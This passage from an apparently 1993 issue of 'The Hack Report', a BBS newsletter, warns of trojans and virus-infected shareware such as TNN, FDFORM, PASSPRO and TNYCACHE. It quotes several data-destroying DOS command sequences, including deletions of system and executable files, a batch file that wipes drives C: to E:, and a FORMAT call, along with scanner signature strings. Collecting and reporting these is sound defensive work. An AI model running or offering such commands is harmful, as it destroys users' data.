apparently filling it with a rather obscene message. The Beta 1 Trojan,
|
|
on the other hand, executes the following sequence of commands:
|
|
|
|
C:
|
|
CD DOS
|
|
DEL COMMAND.COM
|
|
CD\
|
|
DEL COMMAND.COM
|
|
RENAME AUTOEXEC.BAT TEMP.BAT
|
|
RENAME CONFIG.SYS AUTOEXEC.BAT
|
|
RENAME TEMP.BAT CONFIG.SYS
|
|
CD DOS
|
|
DEL *.EXE
|
|
|
|
It then displays its own obscene message on your screen. Rod says that
|
|
TNN.EXE then displays the following message (edited for television):
|
|
|
|
GOODBYE D*******. Wave Ta-Ta to your hard disk.
|
|
Next time, dont enter messages to a public echo if you have
|
|
no idea what you are talking about.
|
|
Love David Humes.
|
|
|
|
Rod's results show that TNN.EXE is simply a "loader" for the two Trojans,
|
|
and not dangerous by itself. He also states that there are other files
|
|
used to "pad out the archive," which are ancillary files from a program
|
|
called VirusBuster v3.91.
|
|
|
|
Thanks to Rod for posting his results. This was definitely a nasty
|
|
little beggar of a Trojan.
|
|
|
|
|
|
HW Hinrich Donner forwards reports from Zone 2 of a "trainer" for the
|
|
game Strike Commander which doesn't appear to act as it should. The
|
|
archive was distributed under the filenames SCTRNUNT and SC-TRN.
|
|
SCTRNUNT contains the following files:
|
|
|
|
!HIREZ COM 6888 19.04.93 23:26
|
|
SCTRNUNT EXE 6442 18.04.93 12:49
|
|
UNT EXE 11431 18.04.93 12:30
|
|
SILVER NFO 81 19.04.93 23:26
|
|
SWIFT NFO 3785 18.04.93 12:12
|
|
UNT NFO 11483 18.04.93 12:26
|
|
|
|
Note that the SC-TRN archive contents were not forwarded, but the
|
|
following file size and description were:
|
|
|
|
SC-TRN.ARJ 9129 Strike Commander - Trainer by [UNT]
|
|
|
|
The file which appears to do the damage, SCTRNUNT.EXE, does so by
|
|
destroying your root directory, partition table, FAT1, and FAT2.
|
|
|
|
|
|
Teo Chee Kian (6:600/600) received a file called GIF_TSR which claimed to
|
|
convert .gif files to "Photo-like Graphics." However, the file is
|
|
actually a compiled batch file which seeks out and deletes all
|
|
"important" files in your DOS, QEMM, WINDOWS, STACKER, and some other
|
|
directories. It also deletes MSDOS.SYS, IO.SYS, COMMAND.COM, CONFIG.SYS,
|
|
and AUTOEXEC.BAT - it calls ATTRIB.EXE to remove the hidden, system, and
|
|
read-only attributes when necessary. Definitely a file to avoid.
|
|
|
|
|
|
Emmanuel Bataille (2:320/7) forwarded a message from Serge Ayotte
|
|
(Internet, rider@geolser.login.qc.ca) about a possible isolated incident
|
|
of an infected copy of the BNU FOSSIL Driver, version 1.88 beta
|
|
(BNU188B). The archive Serge found was infected with the Screaming Fist
|
|
650 virus. Serge goes on to say that the infection is detectable by
|
|
version 104 of McAfee's ViruScan, but not by version 102.
|
|
|
|
Rod Fewster (3:640/886) reports that there are two other dangerous
|
|
versions of BNU, under the filenames BNU200 and BNU202 (see also the
|
|
"Hacked Files" section of this report). He says that they are identical
|
|
except for differences in the documentation files and internal messages,
|
|
and that both attack your hard drive's partition table and master boot
|
|
record (MBR).
|
|
|
|
Note that there is a real version 1.88 beta of BNU, but it was not
|
|
intended for public release, according to the author of BNU, David
|
|
Nugent. The latest official public release of BNU is v1.70.
|
|
|
|
|
|
HW Nemrod Kedem (2:403/138) reports that a new Trojan has been found in
|
|
Israel, named RASPEED. He forwards the following archive information:
|
|
|
|
Archive: RASPEED.ARJ
|
|
|
|
Name Length Method SF Size now Mod Date Time CRC
|
|
=========== ======== ======= ==== ======== ========= ======== ========
|
|
RASPEED.EXE 29120 Comp-1 37 18242 21 May 93 08:51:14 B9717331
|
|
RASPEED.DOC 4344 Comp-1 66 1443 21 May 93 12:46:36 194BB7EB
|
|
FILE_ID.DIZ 611 Comp-1 57 262 20 May 93 10:13:48 0E680542
|
|
=========== ======== ======= ==== ======== ========= ======== ========
|
|
*total 3 34075 ARJ 4 40% 21310 29 May 93 21:16:56
|
|
|
|
The program is aimed at RemoteAccess BBS Systems - it copies the
|
|
USERS.BBS file over to a file called JACKLINE.GIF located in the first
|
|
file area listed in your FILES.RA file. It also adds a description to
|
|
the FILES.BBS file that reads "JACKLINE.GIF (640x480x256)".
|
|
|
|
This program works with RA v1.11, but not with RA v2.00 gamma. A full
|
|
text of Nemrod's results can be found in the file RASPEED.RES, part of
|
|
the FILETSTS.LZH archive found in the archive version of The Hack Report.
|
|
|
|
|
|
David Snider, a user of Douglas Taylor's system (1:147/1077), reports via
|
|
the FidoNet DIRTY_DOZEN echo on a file called BRE0911. Apparently, a
|
|
file inside this archive called UPDATE.COM is infected with a virus (no
|
|
name given) which David says is only detectable by MS-DOS 6.0's VSAFE
|
|
program. The virus in question re-writes your COMMAND.COM file, adding
|
|
to it slowly over a period of time: a fellow sysop who was infected for
|
|
8 days wound up with a COMMAND.COM file over 70K in size.
|
|
|
|
According to David's report, there is a legitimate release of this
|
|
program, under the filename BRE0910. He did not describe what the real
|
|
program was, however, nor did he provide any archive statistics. All he
|
|
said was that "nothing above BRE0910 is legal". Shawn McMahon
|
|
(1:206/1701.66) says that this sounds like "Barren Realms Elite," a BBS
|
|
door game.
|
|
|
|
|
|
Now, some info on a DEBUG script forwarded by Jack Cross (1:3805/13) from
|
|
the FidoNet BATPOWER echo. The script, which has generated a great deal
|
|
of discussion, created an archive (LZH) of the program TinyCache
|
|
(filename TNYCACHE), claiming to be a small disk cache.
|
|
|
|
As soon as the script was posted, folks started reporting symptoms of
|
|
destructive activity: destroyed FATs and reformatted hard drives were
|
|
been reported after this program was run.
|
|
|
|
Prior to the publication of the April edition of this report, I tried a
|
|
feeble attempt at analyzing this program myself. However, as I have said
|
|
before to folks who contact Hack Central Station, I'm a reporter, not an
|
|
AV expert. So, I forwarded a copy of this script to HW Jeff White of The
|
|
Pueblo Group for testing. Others ran their own tests, and still others
|
|
forwarded the resulting archive for further testing. The reports (which
|
|
are _far_ too numerous to credit in their entirety - please accept my
|
|
thanks for your help!) had some similar results, but left some confusion
|
|
as to what this file actually is.
|
|
|
|
All of the reports indicate that the unarchived file, TNYCACHE.COM, is
|
|
compressed with PKLite and that the PKLite ID header was edited out of
|
|
the resulting file. Once decompressed, McAfee's SCAN reported that the
|
|
file was infected with the Taiwan3 [T3] virus, and Frisk's F-Prot
|
|
detected the AnitCAD virus.
|
|
|
|
This is where things get wierd. Bill Dirks (1:385/17) reported that
|
|
there were two versions of the file - TNYCACHE.EXE and TNYCACHE.COM. He
|
|
also said that the .exe version is actually a renamed copy of the SCCHECK
|
|
Trojan, and that the .com version is "hacked to include a hacked version
|
|
of the AntiCAD virus."
|
|
|
|
Bill included the following scanner strings for use with McAfee's SCAN:
|
|
|
|
"2BC00221200961642E6578652004" Pklited-Anticad
|
|
"46048B4E068B56088B5E0CCD261B" Sccheck-Trojan
|
|
|
|
The second string can also be used with Frisk's F-Prot as a user string,
|
|
as long as you inform the program that it is a .com/.exe infector.
|
|
|
|
However, Bob Stettina, a user at 1:382/77, had a different analysis of
|
|
this file, based on a report he says he received from Spencer Clarke of
|
|
McAfee Associates. Bob also decompressed the PKLited .com file and
|
|
received a Taiwan3 [T3] report from McAfee's SCAN v102. After this, he
|
|
uploaded the file to McAfee Associates.
|
|
|
|
The report received from Mr. Clarke said, according to Bob, that this
|
|
file is "a unique/new Trojan, and it is *NOT* actually infected with a
|
|
virus: rather, this Trojan includes a segment of code that is
|
|
accidentally 'recognized' by SCAN as the Taiwan3 virus." The report also
|
|
stated that other scanners gave off false alarms on this file. Finally,
|
|
Bob goes on to say that this file does not replicate: since the ability
|
|
to reproduce is part of the basic definition of a virus, Bob concludes
|
|
that this one fails that test and is therefore a Trojan.
|
|
|
|
HW Jeff White's test results tended to agree with the majority of the
|
|
reports: the .com file was simply infected with the Taiwan3 [T3] virus,
|
|
and was capable of being "cleaned" by McAfee's Clean-Up v102.
|
|
|
|
This has been a fascinating study in program analysis. Unfortunately,
|
|
the story does not end here. Oliver Bladek (1:134/49) has found the file
|
|
posted as an archive on a BBS under the filename TNYCACHE. The file
|
|
exhibited the same symptoms reported above. It would seem, therefore,
|
|
that whatever the program actually is, be it virus, Trojan, or whatever,
|
|
it has been re-created from the DEBUG script by someone, not run on their
|
|
system, and later absent-mindedly uploaded as an archive to a BBS. If
|
|
you see this file, make sure it's the same one we're talking about here:
|
|
if it is, delete first and ask questions later.
|
|
|
|
|
|
Andy Thomas (1:125/217) forwarded a report from Allan Thomas (Smartnet
|
|
Virus Conference) about an infected copy of the archive BBSLAWS. The
|
|
archive contained two files - NEWLAWS.TXT and README.COM. The .txt file
|
|
seemed to be for real, but the .com file was another story. According to
|
|
Allan, the program displays the following message just before it locks up
|
|
your system:
|
|
|
|
"Install v1.0 (c) Vivid Imaginations, Ltd. All rights reversed."
|
|
|
|
As Allan points out, note the spelling of the last word in the above
|
|
quote: quite subtle. The damage you will find after you reboot is not
|
|
so subtle, though - the program at least overwrites your MBR and 1st FAT,
|
|
deletes itself, and overwrites the remnants of itself with garbage to
|
|
hide the evidence. When it overwrites itself, it writes enough bytes to
|
|
cover every sector it used to occupy, resulting in a write of more bytes
|
|
than the original file size.
|
|
|
|
|
|
Paul Harney (1:107/579) forwarded a message from a user, Rod Fewster,
|
|
concerning a sighting of something claiming to be PKZip v2.04I. The
|
|
file, a self-extracting archive called PKZ204I, shows a "valid"
|
|
authenticity verification on unpacking. However, Rod says both the
|
|
internal files PKZIP.EXE and PKUNZIP.EXE "whack out your CMOS settings
|
|
totally as soon as they're run." No other damage was reported.
|
|
|
|
Here are the vital stats, as provided by Rod:
|
|
|
|
"Archive date is 02-22-93 20:35.
|
|
|
|
"All files are dated 02-22-93 02.04 except pkunzip.exe
|
|
which is dated 02-22-93 20:34."
|
|
|
|
Rod also provided a comparison between v2.04g and this file's
|
|
executables:
|
|
|
|
"v2.04g filesizes are: pkzip.exe 42166 pkunzip.exe 29378
|
|
v2.04i filesizes are: pkzip.exe 42186 pkunzip.exe 29398"
|
|
|
|
|
|
Chuck Gustafson (1:2201/33) forwarded to the FidoNet echo DIRTY_DOZEN a
|
|
report from Brian Buchanan (Brian Buchanan #1 @8251 VirtualNET) about the
|
|
file FDFORM. This appears to be an isolated incident of a Trojan version
|
|
of the legitimate program FDFormat. The .zip archive was only 13106
|
|
bytes long, and contained the files FDOCS.PAK (317 bytes), FDFORMAT.PAK
|
|
(11366 bytes), and FDSETUP.BAT (174 bytes). The .bat file contains the
|
|
following commands:
|
|
|
|
@echo off
|
|
cls
|
|
echo Analizing system configuration...
|
|
@echo off
|
|
ren fdocs.pak fd.exe
|
|
echo Unpacking files...
|
|
echo (This may take a few minutes)
|
|
fd c:\
|
|
fd d:\
|
|
fd e:\
|
|
|
|
The problem here is that the file FDOCS.PAK is actually a renamed copy of
|
|
a program called NHUE, which according to Brian is a utility that deletes
|
|
all files and sub-directories in the directory specified on the command
|
|
line. If you look at what happens in the .bat file, you'll note that
|
|
NHUE, originally renamed FDOCS.PAK, is re-renamed to FD.EXE and is called
|
|
for drives C: through E:, potentially wiping out everything on these
|
|
drives.
|
|
|
|
|
|
Lee Noga (1:3618/23), apparently one of the folks associated with the
|
|
PowerPak Gold '92 Shareware CD-ROM disk, asked that I help warn folks of
|
|
a Trojan file on their disk called MWARS20. This file, which has been
|
|
seen in other locations, contains two files, DEMO.EXE and READTHIS.COM,
|
|
which appear to be the main culprits. According to a report from Scott
|
|
Catterill (Intelec PC-Security conference, via HW Bill Lambdin and based
|
|
on info from Dave Comeau), both files contain the following text:
|
|
|
|
eat this. REVENGE!. Melting Memory!. Maybe next time, you won't steal
|
|
people's Passwords and get them ****** off at you... I hope you backed
|
|
up your hard drive!
|
|
|
|
Scott says both will try to low-level format your hard drive. However,
|
|
according to Lee Noga's report, the program acts a bit differently. The
|
|
copy on the PowerPak CD-ROM contains the following files:
|
|
|
|
MWARS.BAT 128 07/17/92
|
|
MWARS20.EXE 15864 02/15/92
|
|
MWARS20.DOC 2058 07/17/92
|
|
NOTE.DOC 309 01/01/80
|
|
YANG.ME 121 07/17/92
|
|
INSTALL.EXE 39080 06/14/90
|
|
DEMO.EXE 5470 04/22/90
|
|
DOMENOW.COM 937 09/24/90
|
|
READTHIS.COM 5470 04/22/90
|
|
|
|
Lee says the program does its damage via the .bat file, via DEMO.COM, and
|
|
via DOMENOW.COM - all three are dangerous, as they will scramble your
|
|
hard drive's FAT table. The same message as Scott reports will appear,
|
|
but if you reboot during its display, you may be able to abort the
|
|
Trojan's damage. Lee also notes that the game itself was untouched: if
|
|
you don't invoke it via the .bat file, it will run just fine. Bizarre.
|
|
|
|
(Editorial - I appreciate the effort taken by vendors to inform the
|
|
public of a problem with their product. Even if the publicity hurts
|
|
sales, the loss can't be worse than the potential loss caused by a
|
|
perception that a company doesn't care about whether or not their product
|
|
is dangerous. This is not an indictment of _any_ company or author: it
|
|
is merely intended to encourage companies and authors to report attacks
|
|
against and/or problems with their products as soon as they learn of
|
|
them. My life would be _so_ much easier. <g> -lj)
|
|
|
|
|
|
Tom Guelker (1:2250/26) posts in the FidoNet DIRTY_DOZEN echo a report of
|
|
a Trojan called SINBAD. It claims to be a file transfer protocol
|
|
utility, but it actually throws your system into a perpetual loop by
|
|
overwriting your AUTOEXEC.BAT file. The new AUTOEXEC.BAT (as well as
|
|
SINBAD.EXE) becomes read-only and invokes SINBAD.EXE, which again
|
|
overwrites AUTOEXEC.BAT with the same info (apparently turning off the
|
|
read-only bit first <?>), etc. ad nauseum. Definitely sounds irritating,
|
|
but not dangerous unless you don't have a copy of your original
|
|
AUTOEXEC.BAT file: you can bypass the loop by booting from a known
|
|
clean, write-protected system disk, and then use a utility such as the
|
|
MS-DOS 4.01 and above ATTRIB.EXE to remove the read-only bit. This will
|
|
allow you to delete the offending .bat file and replace it with a copy of
|
|
your original, or to re-write it if you didn't have a backup.
|
|
|
|
|
|
Henry Shaw (1:261/1177, via Jack Cross, 1:3805/13) reports on TAGCRASH, a
|
|
supposed utility or crack of some sort for TAG BBS systems. Henry says
|
|
the archive contained the internal file TAGUTIL.COM, which started off in
|
|
your \BBS directory and "worked its way through the obvious choices of
|
|
\TAG and \MULTI till it found all the .DAT files, .LST files and
|
|
everything else that pertained to a TAG board." These files would be
|
|
deleted when found. An easy way to trash a TAG system, Henry says.
|
|
|
|
|
|
HW Richard Steiner forwarded a message from the ILink Shareware_Support
|
|
conference by Bob Feldman concerning an archive named HSDIAG. Bob stated
|
|
that this file is a Trojan. Bob posted further details on the ILink
|
|
Virus conference (forwarded by HW Bill Lambdin), and also sent a copy of
|
|
the file to R. Wallace Hale, SysOp of the Driftnet BBS ((506)325-9002).
|
|
Mr. Hale did preliminary testing of the file, and was able to determine
|
|
that it will at least try to overwrite the first 255 sectors on the first
|
|
eight drives in a system, including floppy drives. For the full text of
|
|
Mr. Hale's report, as forwarded by HW Bill Lambdin and James FitzGibbon
|
|
(1:250/301), please obtain the archive version of The Hack Report and see
|
|
the file HSDIAG.RES, located inside the internal archive FILETSTS.LZH.
|
|
|
|
|
|
HW Jeff White received a file for testing called ANSIVIEW.COM, which has
|
|
apparently been seen inside a couple of archives, most often ANSI
|
|
collections. The copy Jeff received for testing is infected with the
|
|
AIDS [N1] virus, and cannot be disinfected by either McAfee's Clean-Up or
|
|
the AIDSOUT utility. The infection is detectable by McAfee's SCAN. Yet
|
|
another of The Hack Squad's 2048 reasons to check everything you download
|
|
for viruses.
|
|
|
|
|
|
HW Scott Raymond has cleared up a discrepancy that I had in previous
|
|
reports concerning the file BWAVE_3. This was listed as a hack of the
|
|
Blue Wave Offline Reader, but according to the report received by Scott
|
|
from a user in Australia, the file is actually a Trojan. The user in
|
|
Australia reported that the Trojan trashed partitions and boot sectors,
|
|
in addition to attacking RemoteAccess BBS data files. According to
|
|
Scott, this is the same file reported by Frans Hagelaars (2:512/2).
|
|
Please note that this Trojan was discovered prior to the release of
|
|
BWAVE212, version 2.12 of the reader.
|
|
|
|
More Australian sightings come from Greg Miller (3:711/454), via HW
|
|
Emanuel Levy, and Nigel Hunt (3:712/218). No archive name was given, but
|
|
the file again claimed to be version 3.0 of Blue Wave. It didn't exhibit
|
|
any dangerous behaviour, but it does seem to at least be related to the
|
|
above file: it doesn't do QWK packets (v2.12 does), and it has no delay
|
|
screen for unregistered users.
|
|
|
|
|
|
Vincent Aniello (aniello@gauss.rutgers.edu) reported a "back door" for
|
|
use when logging onto Renegade BBS systems. This file, RGBACKDR, claims
|
|
to allow you to log onto any Renegade board with SysOp privileges.
|
|
Instead, it makes a beeline for several key files on _your_ system and
|
|
deletes them. For the full text of the test results, as performed by HW
|
|
Jeff White of The Pueblo Group, see the file RGBACKDR.RES in the archive
|
|
FILETSTS.LZH, found in the archive version of The Hack Report.
|
|
|
|
|
|
Maynard Marquis (1:141/328) forwarded a message to the FidoNet Int'l Echo
|
|
WARNINGS from Joel Lambert about a file called TW-CHEAT. This claims to
|
|
be a cheat file for Tradewars 2002, and contains the following files:
|
|
|
|
TW-CHEAT EXE 6306 03-09-93 9:47p
|
|
SIN COM 535 03-09-93 9:47p
|
|
|
|
He did not say which file he ran, but one of these displayed "some
|
|
unrelated menu" and then returned to DOS. Apparently, Joel later
|
|
rebooted, at which point the BOOTSAFE program (part of Central Point
|
|
Antivirus) reported that his system had been infected with the Tequila
|
|
virus. Fortunately, he was able to remove the infection. He hopes. I
|
|
hope so too, for his sake.
|
|
|
|
|
|
Michael Heinbockel (2:242/316) found a file on a BBS in Hamburg, Germany,
|
|
called PARITY. This file renames your AUTOEXEC.BAT file to AUTOEXEC.BAK,
|
|
creates a new AUTOEXEC.BAT file with the single line C:\DOS\PARITY.EXE,
|
|
and then tries to copy itself to your C:\DOS\ directory. It usually
|
|
hangs the system during the copy attempt, resulting in the file not being
|
|
copied. It may be a Trojan that doesn't work, but it is still a Trojan.
|
|
|
|
|
|
Several reports came in on yet another Trojan attack against McAfee's
|
|
SCAN - this time, under the filename SCANV103. The first report came via
|
|
Eugene Woiwod (Eugen_Woiwod@mindlink.bc.ca), and full test results were
|
|
later received from Bill Logan of The Pueblo Group (via HW Jeff White).
|
|
As a result of this Trojan, McAfee Associates decided to skip version
|
|
number 103, using number 104 as the release which followed SCANV102. For
|
|
a full text of Bill's test results, see the file SCANV103.RES in the
|
|
archive FILETSTS.LZH, found in the archive version of The Hack Report.
|
|
|
|
|
|
Staale Fagerland (staale.fagerland@euronetis.no) reported a file called
|
|
CES_402, which claimed to be an antiviral program. However, the archive
|
|
contains two files (CES.COM and DONT_!) which are quite suspicious.
|
|
Staale ran the CES.COM file through a program called CHK4BOMB and
|
|
discovered that it uses ROM BIOS routines for direct disk access. The
|
|
file DONT_! contains several messages that relate to corrupting your FAT,
|
|
partition table, etc., and the message, "Mate(s), it simply makes sense,
|
|
make a backup...".
|
|
|
|
|
|
Ashley Kleynhans (5:7101/55) reports a Trojan called DREAMDEM, which
|
|
claims to be a demo of some sort by a computer group. According to
|
|
Ashley, the group named in the file descriptions is not responsible for
|
|
creating this Trojan. When run, the file displays several messages,
|
|
including ones like, "found PC Speaker," "Found porno GIFs," etc., and
|
|
finally asks whether or not you have a sound card. Ashley answered Yes
|
|
to this question, and received the response, "OH by the way, I trashed
|
|
your hard disk about a minute ago."
|
|
|
|
Ashley immediately did a DIR command on the C: drive and saw no immediate
|
|
damage. However, the entire disk was gone after a system reset. Ashley
|
|
says this is because the Trojan deletes both your hard disk partition
|
|
table and your boot sector. I'm not sure if this is right, but I
|
|
wouldn't want to try it out on my system to verify Ashley's findings.
|
|
|
|
Here is the internal file info:
|
|
|
|
CHECKANS COM 3585 03-10-93 2:43p
|
|
VGADEMO EXE 8892 04-17-93 7:45p
|
|
START BAT 17 04-17-93 1:33p
|
|
|
|
Ian Douglas (5:7102/119) forwarded further information on what appears to
|
|
be the same file from a report by Shane Greyvenstein (5:7102/119). This
|
|
file, called VGADEM1, apparently managed to delete a lot of Shane's files
|
|
before he could stop it: fortunately, it doesn't appear to have trashed
|
|
Shane's disk. However, Shane's test revealed that the file was written
|
|
using two packages called "IntroMaker v3.0" and "Mod-OBJ," but that the
|
|
files are encrypted so that the copyright messages for these two packages
|
|
are not visible until after they are decrypted by the host program.
|
|
|
|
|
|
Brent Thomas (1:202/226) says in the FidoNet DIRTY_DOZEN echo that his
|
|
system was "taken down" by a file called DRAGON. It claimed to be a
|
|
Public Domain VGA and Sound Blaster supported game. No symptoms were
|
|
reported, except that he had to reformat his hard drive.
|
|
|
|
Penny Nebrich (1:369/101) confirms this, saying that the program that was
|
|
affected was one called Dragon's Shard. She states that it "created what
|
|
looked like infinite subdirectories with binary names of I think it was a
|
|
dir name of 8 chars. McAfee's scan and Virucide just got stuck in an
|
|
infinite loop. I had to reformat my drive."
|
|
|
|
Bill Roark (RIME Shareware conference, via HW Richard Steiner) verifies
|
|
that there is a legitimate file called Dragon's Shard, available under
|
|
the filename DRAGON21. He also states that the real program is not
|
|
public domain, but shareware instead.
|
|
|
|
So, what we have here would seem to be a pair of isolated incidents of
|
|
an altered version of a legitimate program. As the documentation Bill
|
|
forwarded states, if you feel you have an altered copy of the program,
|
|
contact the publishers with your information. They can be reached at:
|
|
|
|
Bit Brother Software
|
|
c/o Michael Ramsey
|
|
#2 Winged Foot Way
|
|
Littleton CO 80123
|
|
|
|
|
|
Josh Burke (1:138/174) reports, via Charlie Sheridan (1:356/18), Travis
|
|
Griggs (1:3807/8), and HW Bob Seaborn, a problem with the file PHYLOX2.
|
|
In what might be an isolated incident, Josh says the file claimed to be a
|
|
"really cool game, VGA gfx and SB sound." However, the INSTALL program
|
|
destroys hard disks.
|
|
|
|
Bob Seaborn received a copy of this file and forwarded it to me - I in
|
|
turn forwarded it to Bill Logan and HW Jeff White for testing. As it
|
|
turns out, there is an internal file called SETUP.EXE that is identical,
|
|
byte for byte, with the file INSTALL.EXE. Both will trash your hard
|
|
drive with amazing speed, according to HW Jeff White. Also, the file
|
|
PHYLOX.EXE is flagged as a possible infected file. For a full text of
|
|
the test results, see the file PHYLOX.RES in the internal archive
|
|
FILETSTS.LZH, found in the archive version of The Hack Report.
|
|
|
|
|
|
Ryan Tucker (1:290/10) forwards a message from a fellow SysOp, Robert
|
|
Pedersen, about ASM2PAS. This claims to create Pascal source code from
|
|
an .EXE file. However, from text inside the executable, it appears that
|
|
this program tries to delete your DOS directory. It also brags about a
|
|
certain anti-viral scanner not being able to detect it.
|
|
|
|
Valid point, that: practically _no_ anti-viral tools detect Trojans,
|
|
with the exception of Frisk's F-Prot and one or two others. Even then,
|
|
the Trojan detection is not complete. Your best protection against
|
|
Trojans is a religiously maintained set of backups, preferably done after
|
|
a check for viruses on your hard drive(s).
|
|
|
|
|
|
HW Richard Steiner forwarded a message from the America OnLine GEOWORKS
|
|
forum about the file GEOCOMM. The message, from "GW Steve" (a "GeoRep",
|
|
according to Richard), came from a user of GeoComm named J. S. James, and
|
|
warned that this archive contains a hacked version of the original
|
|
GeoComm program. The file claims to be an "update," but it seems to be a
|
|
Trojan which will damage your File Allocation Table (FAT). Not a file to
|
|
be kept around, it would seem.
|
|
|
|
|
|
HW Bill Lambdin reports on LAW22 (no description), which contains the
|
|
following files:
|
|
|
|
Length Date Time CRC-32 Attr Name
|
|
------ ---- ---- -------- ---- ----
|
|
22911 02-24-93 14:13 a4b84cc7 --w- ABOUT.COM
|
|
13422 02-24-93 14:44 8f0d1e96 --w- INFO.EXE
|
|
126 02-24-93 14:50 68c9463a --w- DESC.SDI
|
|
------ -------
|
|
36459 3
|
|
|
|
Bill says that ABOUT.COM contains a virus. Scan 102 labels it as BA101,
|
|
which is a 160 byte-long .COM file infector. This could be an isolated
|
|
incident of an infected legitimate file, so thoroughly check any such
|
|
file you find that has the above files in it before you kill it.
|
|
|
|
|
|
Another report from Mr. Lambdin concerns a file that a user in the
|
|
Intelec PC-Security conference sent to him, called PCS204 (PC-Sentry
|
|
v2.04). Bill's tests show that this copy of the archive contains two
|
|
files, INSTALSW.COM and EVERYDAY.COM, that are infected with a
|
|
non-resident "companion" virus that utilizes the Mutation Engine. It
|
|
also contains the file PCS.EXE, which is infected with a virus created by
|
|
a virus-writing group's "Mass Produce Code Generator."
|
|
|
|
|
|
Bill also reports that our old friend, the Power Pump virus, has
|
|
resurfaced inside a file called FX2. Here's the archive info:
|
|
|
|
Length Date Time CRC-32 Attr Name
|
|
------ ---- ---- -------- ---- ----
|
|
25846 01-01-92 00:00 2635e28a --w- FX2.EXE
|
|
1199 01-01-92 00:00 f61885bd --w- FX2.COM
|
|
17354 01-01-92 00:00 02eac55c --w- POWER.EXE
|
|
1007 01-01-92 00:00 139e1291 --w- FX2.DOC
|
|
------ -------
|
|
45406 4
|
|
|
|
The giveaway here is the file POWER.EXE. For a full documentation of the
|
|
Power Pump virus, please see the 1992 Full Archive Edition of The Hack
|
|
Report (filename HACK92FA), available from most official distribution
|
|
sites.
|
|
|
|
|
|
Travis Griggs (1:3807/8) forwarded a report from a local board called The
|
|
Forum (phone number 1-318-528-2107) by a user named Susan Pilgreen. The
|
|
message referred to a file called BOUNCE, which she said was infected
|
|
with the Beeper (Russian Mirror) virus. The file, according to Travis,
|
|
claimed to be a game. Travis has now forwarded the file information on
|
|
this archive:
|
|
|
|
Filename Original DateTime modified CRC-32 Attr BTPMGVX
|
|
------------ ---------- ----------------- -------- ----------
|
|
BOUNCE.COM 4053 80-01-01 00:02:04 35C562AF A--W B 1
|
|
BOUNCE.DAT 119101 92-11-20 23:16:10 247712A8 A--W B 0
|
|
BOUNCE.DOC 348 92-11-20 23:21:46 B28557FE A--W B 1
|
|
------------ ----------
|
|
3 files 123502
|
|
|
|
|
|
Geoffrey Liu (1:229/15) reports in the FidoNet WARNINGS echo on a file
|
|
called BWE. This claims to provide a "quick and easy way to exit
|
|
Windows." Geoffrey forwards this file info and disassembly report from
|
|
John Eady (1:229/15, john.eady@canrem.com):
|
|
|
|
Name Length Mod Date Time CRC
|
|
============ ======== ========= ======== ========
|
|
LICENSE.TXT 2656 14 Feb 93 22:01:14 46B50814
|
|
ORDER.TXT 2335 12 Feb 93 12:00:18 9D1A705E
|
|
README.TXT 3565 14 Feb 93 23:08:08 3EA7548E
|
|
BWE.EXE 19517 14 Feb 93 23:02:34 F1729CA4
|
|
============ ======== ========= ======== ========
|
|
*total 4 28073 14 Feb 93 23:08:08
|
|
|
|
"After debugging part of the virus, the following text appears (encrypted)
|
|
in the infected program:
|
|
|
|
It's time for a math test curtesy of YAM!
|
|
|
|
And the question is...
|
|
|
|
What is 00 + 00 =
|
|
|
|
WRONG!!!! TRY AGAIN!
|
|
|
|
Admiral Bailey
|
|
|
|
"This virus is self-encrypting, but does not use any stealth techniques
|
|
(as far as I've seen). It doesn't appear to infect the boot record, or
|
|
the boot partition record. It does not appear to infect .SYS files, or
|
|
.OV? files.
|
|
|
|
"If you feel you have been infected, examine any EXE or COM files that you
|
|
believe are infected. Check the 4th and 5th bytes in a COM file for the
|
|
characters "BA". Check the 12th and 13th bytes in a EXE file for the
|
|
characters "BA". If you find a file like this, chances are you have been
|
|
infected."
|
|
|
|
|
|
Mike Wenthold (1:271/47) found a program under the filename GS2000 which
|
|
contained the VCL 3 [Con] Virus. The archive contains the following
|
|
files:
|
|
|
|
Length Date Time CRC Filename
|
|
======== ========= ====== ======== ============
|
|
1984 22-Dec-91 01:40p 3527B16B GS2000.COM
|
|
543 22-Dec-91 01:58p DB83A2C0 GSUNP.DOC
|
|
======== ========= ====== ======== ============
|
|
2527 2 files.
|
|
|
|
The compression method (on this ZIP archive) was not included in his
|
|
data. According to Dave Lartique (1:3800/22) and Chris Gramer
|
|
(1:271/47), the program is an "unprotect" for MicroProse's game Gunship
|
|
2000. This appears to be another isolated incident of an infected
|
|
legitimate file.
|
|
|
|
|
|
William Gordon (1:369/104) reports BEV105, a file that claims to be a
|
|
"Beverly Hills 90210 Adventure Game." This file contains 8 files, but
|
|
two seem to be the real culprits: DORINFO.DIR and INSTALL.COM. The
|
|
installation renames the DORINFO.DIR file to IDCKILL.EXE and invokes it.
|
|
This program asks for some sort of wildcard according to William, then
|
|
proceeds to delete everything on your drive that matches that wildcard.
|
|
However, it doesn't stop there: it continues on and deletes all .bat,
|
|
.fon, .com, .zip, .sys, .ice, .ans, .arj, and .exe files. William also
|
|
says the file "comes with the following virii: Bootkill and Genesis."
|
|
|
|
A copy of this file was sent to Mr. White and Mr. Logan, who were able to
|
|
confirm the behaviour that William reported. For the complete results of
|
|
their test, see the file BEV105.RES in the FILETSTS.LZH archive, included
|
|
in the archive version of The Hack Report.
|
|
|
|
|
|
Another report from Bill concerns a file he located called TAXTIP93.
|
|
This archive contains a file called TAXTIP93.DAT, which the executable
|
|
file, TAXTIPS.EXE, renames to MOUSE.COM and tries to copy to your DOS and
|
|
WINDOWS directory. The new MOUSE.COM is infected with the ADA virus.
|
|
|
|
|
|
Brian Chan (Internet, chanav@sfu.ca) found a file called PASSPRO, which
|
|
was described with a very short line ("'Password,' or some other short
|
|
word," according to Brian). The archive contained these files:
|
|
|
|
PASS .PA1
|
|
PASS .PA2
|
|
PASS .PA3
|
|
PASSWORD.COM
|
|
|
|
Brian looked inside the .com file, which he says looks like a compiled
|
|
batch file, and found these strings/commands:
|
|
|
|
Please Wait While Loading;
|
|
It may take in between 30seconds to 5 minutes
|
|
To unshrink nessessary files
|
|
Please Turn off Screen, and wait for the beep.
|
|
If You do not, your screen might not function
|
|
the way it should.
|
|
Turn Off Screen now, and press the space bar.
|
|
|
|
/C REN pass.pa1 pa.exe
|
|
pass.pa2 /C DEL c:\*.*
|
|
pass.pa2 /C DEL c:\dos\*.*
|
|
/C REN pa.exe pass.pa1
|
|
pass.pa3 FORMAT
|
|
c:
|
|
/C CLS
|
|
|
|
